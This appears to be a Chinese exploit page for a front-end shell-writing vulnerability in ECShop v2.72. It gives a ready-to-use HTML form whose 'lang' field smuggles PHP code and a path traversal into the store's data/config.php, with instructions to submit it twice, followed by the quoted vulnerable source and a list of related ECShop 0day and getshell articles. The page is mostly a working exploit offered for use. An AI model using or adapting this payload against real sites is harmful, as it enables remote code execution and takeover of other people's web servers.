by:xhm1n9 <title>ecshop v2.72 前台写shell漏洞 by:xhm1n9</title> <form method="post" name="register" action="http://127.1/ecshop2.72/demo/index.php"> <h3>ecshop v2.72 前台写shell漏洞</h3>利用方试:提交两次,第二次内容任意</br> <input type="text" name="lang" size="80" value="');phpinfo();(_1_/../../../index" /> <input type="hidden" name="step" value="readme" /> <button class="submit" type="submit" name="regsubmit" value="true">提交</button> </form> <!------------- demo/index.php if (!empty($_POST['lang'])) { $lang_charset = explode('_', $_POST['lang']); $updater_lang = $lang_charset[0].'_'.$lang_charset[1]; $ec_charset = $lang_charset[2]; } ........................................ $updater_lang_package_path = ROOT_PATH . 'demo/languages/' . $updater_lang . '_' . $ec_charset .'.php'; if (file_exists($updater_lang_package_path)) { include_once($updater_lang_package_path); $smarty->assign('lang', $_LANG); } else { die('Can\'t find language package!'); } /* 初始化流程控制变量 */ $step = isset($_REQUEST['step']) ? $_REQUEST['step'] : 'sel_lang'; $smarty->assign('ec_charset', $ec_charset); $smarty->assign('updater_lang', $updater_lang); switch($step) { case 'readme' : write_charset_config($updater_lang, $ec_charset); ....................................... function write_charset_config($lang, $charset) { $config_file = ROOT_PATH . 'data/config.php'; $s = file_get_contents($config_file); $s = insertconfig($s, "/\?\>/",""); $s = insertconfig($s, "/define\('EC_LANGUAGE',\s*'.*?'\);/i", "define('EC_LANGUAGE', '" . $lang . "');"); $s = insertconfig($s, "/define\('EC_CHARSET',\s*'.*?'\);/i", "define('EC_CHARSET', '" . $charset . "');"); $s = insertconfig($s, "/\?\>/","?>"); return file_put_contents($config_file, $s); } ----------------->
只显示10条记录相关文章
ecshop最新版 (v272) 本地包含拿SHELL (浏览: 18576, 评论: 0)
ecshop后台获取shell最新方法,通杀最新版本&后台低权限 (浏览: 18171, 评论: 0)
ecshop最新版(v272) 本地包含漏洞ODAY(鸡肋) (浏览: 16095, 评论: 0)
ECshop 支付方式注射 0day (浏览: 14387, 评论: 0)
ecshop2.72鸡肋注入 (浏览: 11154, 评论: 0)
ecshop 通杀2.6*2.7 GBK版本 oday 爆路径 GetShell (浏览: 13017, 评论: 0)
ecshop后台拿shell的又一种方法 (浏览: 13926, 评论: 0)
ecshop SQL注射漏洞0821 0day (浏览: 11168, 评论: 0)
ECSHOP数据库结构参数表结构说明 (浏览: 15221, 评论: 0)
再说两种ecshop后台拿shell的方法 (浏览: 12211, 评论: 0)
ecshop后台获取shell最新方法,通杀最新版本&后台低权限 (浏览: 18171, 评论: 0)
ecshop最新版(v272) 本地包含漏洞ODAY(鸡肋) (浏览: 16095, 评论: 0)
ECshop 支付方式注射 0day (浏览: 14387, 评论: 0)
ecshop2.72鸡肋注入 (浏览: 11154, 评论: 0)
ecshop 通杀2.6*2.7 GBK版本 oday 爆路径 GetShell (浏览: 13017, 评论: 0)
ecshop后台拿shell的又一种方法 (浏览: 13926, 评论: 0)
ecshop SQL注射漏洞0821 0day (浏览: 11168, 评论: 0)
ECSHOP数据库结构参数表结构说明 (浏览: 15221, 评论: 0)
再说两种ecshop后台拿shell的方法 (浏览: 12211, 评论: 0)